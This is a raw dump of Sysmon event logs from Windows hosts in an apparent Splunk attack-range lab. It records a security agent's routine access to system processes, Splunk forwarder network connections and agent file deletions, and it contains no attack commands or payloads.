10341000x800000000000000015676Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.720{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015675Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.718{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015674Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.712{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015673Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.709{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015672Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.701{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015671Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015670Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.697{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015669Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.683{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015668Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.680{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015667Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.670{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015666Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.667{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 354300x800000000000000015665Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:01.014{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50060-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000015664Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.652{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015663Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.646{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015662Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.638{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015661Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.633{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015660Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.626{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015659Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.592{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015658Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.587{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015657Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.581{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015656Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.574{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015655Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.568{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015654Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.555{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015653Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.543{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015652Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.540{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000015651Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:02.417{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E2220AC703377EB85528597CA4A586F,SHA256=9622A5641A9AEBCF7639F6D5641F60362EBC87CF53B3AE8B29084051521A2775,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:01.524{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56257-false10.0.1.12-8000- 23542300x800000000000000040870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:03.366{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBD3125534B7596BFE657057EBE0D5E1,SHA256=0CB7974126F60E8A0D104C97F7C6AE5D333F27BB9D64A498CB048B779EEAF7E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015685Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:03.985{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015684Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:03.518{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7713CF148A4B88EEE06C41054AC177A1,SHA256=B8E83A919845F64F9A3D0BA4A071CB218516C73962ED8B2EC9D23E1A4D1157FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:04.447{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F86BEC949A8A9EE348410DA8B53FE2CD,SHA256=AA12577CABA957CAF3472845D3B27F4D3A9065F0EA47C00E08BFE176B9039B65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015687Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:04.886{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-030MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015686Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:04.602{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27491F106B1F209FA799A04321AC9BE,SHA256=9E2009C2403097692683F645467FCFF94C43DEEF7A3B11933365307BA875410E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:05.533{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60F8EAB3145936AA9B03B3031B9E25B6,SHA256=CF0F85905D4E2A6239E6DB2EFBBA6D874A93E2885FD9F00D5FDF080ECA0D4816,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015690Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:05.889{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-031MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015689Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:03.849{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50061-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000015688Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:05.700{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3E1A5A851947587DD4B7B81B23F9E5C,SHA256=7C2B9EF6062953FEF163C9461DAA6027C73F248BE3AC229A62ACB98EED524A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015691Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 